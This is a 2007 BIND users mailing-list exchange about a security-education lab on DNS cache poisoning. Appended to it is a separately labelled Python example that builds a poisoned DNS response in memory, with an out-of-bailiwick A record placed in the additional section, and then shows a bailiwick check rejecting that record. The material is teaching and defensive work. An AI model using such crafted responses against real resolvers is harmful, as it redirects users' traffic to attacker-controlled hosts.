Reg : DNS Cache poisoning
kcd at daimlerchrysler.com
Tue Sep 18 22:57:35 UTC 2007
What you're attempting -- including data for one zone in the zonefile of
another zone -- is an obvious violation of the RFCs and BIND has
rejected it for a long time. The only thing that's changed between the
various versions of BIND 8 and BIND 9 in this regard is whether BIND
believes/trusts/caches records it *receives* from other sources, under
certain circumstances. If you want to *generate* malicious
cache-poisoning records in DNS responses, you'll need to use some other
package, or write your own code...
Sudheer Bysani wrote:
> I'm in the process of developing a lab for Security Education
> (http://www.cis.syr.edu/~wedu/seed/index.html) and require some help on
> conducting DNS Cache Poisoning attacks.
> Pharming Guide (http://www.ngssoftware.com/papers/ThePharmingGuide.pdf)
> explains the DNS Cache poisoning attack, wherein the attacker's name server
> includes additional (faked) resolution records (of other websites)
> apart from what it's actually asked for.
> I'm wondering how exactly to do this. I know this issue has been fixed
> in BIND 9. I was trying the same in 8.4.6, but still unsuccessful.
> This is my SOA for the same:
> @ IN SOA ns1.example.com. admin.example.com. (
> example.com. IN NS ns1.example.com.
> example.com. IN NS ns2.someweb.com.        ; (emphasised in the original)
> example.com. IN MX 10 mail.example.com.
> ns1 IN A 192.168.1.1
> ns2.someweb.com. IN A 192.168.1.2          ; (emphasised in the original)
> Now, if I try to dig www.example.com, it shows ns2.someweb.com as one of
> the name servers, but it actually resolves the IP address of
> ns2.someweb.com if it actually exists.
> How do I make BIND resolve ns2.someweb.com to the IP address I
> mention?
> Is it actually possible to send fake resolution records for a domain
> which the name server doesn't represent?
> Any help is appreciated.
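An added example, not part of either message above: the response Kevin says you would have to generate with "some other package, or write your own code" (an authoritative answer for www.example.com whose authority and additional sections smuggle in an A record for ns2.someweb.com, a name outside example.com), plus the owner-name bailiwick check that a modern resolver applies before caching anything from those sections. The wire encoding is hand-rolled so it runs offline; the zone, names and 192.168.1.x addresses are taken from Sudheer's zone file, the query IP 192.168.1.10 and transaction ID are assumed, and the check is a simplified model of what BIND 9 does, not BIND's own code.

```python
"""DNS cache poisoning via out-of-bailiwick additional records.

Builds the poisoned response an attacker-controlled authoritative server
would send, parses it back, and shows which records a bailiwick-checking
resolver would actually cache. Names/addresses follow the zone file in the
thread (example.com, ns1/ns2, 192.168.1.x); everything else is assumed.
"""
import struct

A, NS = 1, 2          # RR types used here
IN = 1                # class IN


def encode_name(name):
    """Dotted name -> DNS label sequence (no compression used on output)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(pkt, off):
    """Decode a name at pkt[off], following 0xC0 compression pointers.
    Returns (absolute name, offset just after the name in the packet)."""
    labels, jumped, end = [], False, off
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:                       # compression pointer
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:
            if not jumped:
                end = off
            break
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", end


def a_rdata(ip):
    return bytes(int(o) for o in ip.split("."))


def rr(name, rtype, rdata, ttl=3600):
    """One resource record in wire format."""
    return encode_name(name) + struct.pack("!HHIH", rtype, IN, ttl, len(rdata)) + rdata


def build_poisoned_response(qname, qip, zone, zone_ns, zone_ns_ip,
                            foreign_ns, foreign_ip, txid=0x1234):
    """Authoritative reply for qname that also asserts an A record for
    foreign_ns (a name outside `zone`) in the additional section. That
    extra record is the poison: an old resolver that trusted every
    additional record would cache it."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 2, 2)  # QR=1, AA=1
    question = encode_name(qname) + struct.pack("!HH", A, IN)
    answer = rr(qname, A, a_rdata(qip))
    authority = rr(zone, NS, encode_name(zone_ns)) + rr(zone, NS, encode_name(foreign_ns))
    additional = rr(zone_ns, A, a_rdata(zone_ns_ip)) + rr(foreign_ns, A, a_rdata(foreign_ip))
    return header + question + answer + authority + additional


def parse_response(pkt):
    """Split a response into sections of (owner, rtype, rdata-as-text)."""
    _txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    off, sections = 12, {"question": []}
    for _ in range(qd):
        name, off = decode_name(pkt, off)
        qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        sections["question"].append((name, qtype))
    for key, count in (("answer", an), ("authority", ns), ("additional", ar)):
        recs = []
        for _ in range(count):
            name, off = decode_name(pkt, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            off += 10
            if rtype == A:
                data = ".".join(str(b) for b in pkt[off:off + rdlen])
            elif rtype == NS:
                data, _ = decode_name(pkt, off)
            else:
                data = pkt[off:off + rdlen]
            off += rdlen
            recs.append((name, rtype, data))
        sections[key] = recs
    return sections


def in_bailiwick(name, zone):
    """Owner name is at or below the zone the server is authoritative for."""
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def cacheable_records(sections, zone):
    """Simplified bailiwick rule: authority/additional records are kept only
    if their OWNER name lies inside the zone that answered. An NS record
    owned by example.com may name ns2.someweb.com, but the A record owned
    by ns2.someweb.com is discarded and the resolver looks it up itself."""
    keep, dropped = [], []
    for sec in ("authority", "additional"):
        for rec in sections[sec]:
            (keep if in_bailiwick(rec[0], zone) else dropped).append(rec)
    return keep, dropped


if __name__ == "__main__":
    pkt = build_poisoned_response("www.example.com.", "192.168.1.10", "example.com.",
                                  "ns1.example.com.", "192.168.1.1",
                                  "ns2.someweb.com.", "192.168.1.2")
    parsed = parse_response(pkt)
    kept, dropped = cacheable_records(parsed, "example.com.")
    print("cached:", kept)
    print("rejected as out-of-bailiwick:", dropped)
```

The NS record for ns2.someweb.com survives the check (its owner is example.com, which the server is entitled to speak for); only the glue A record owned by ns2.someweb.com is thrown away, which is exactly why `dig` shows the name server but the resolver still goes and resolves ns2.someweb.com on its own.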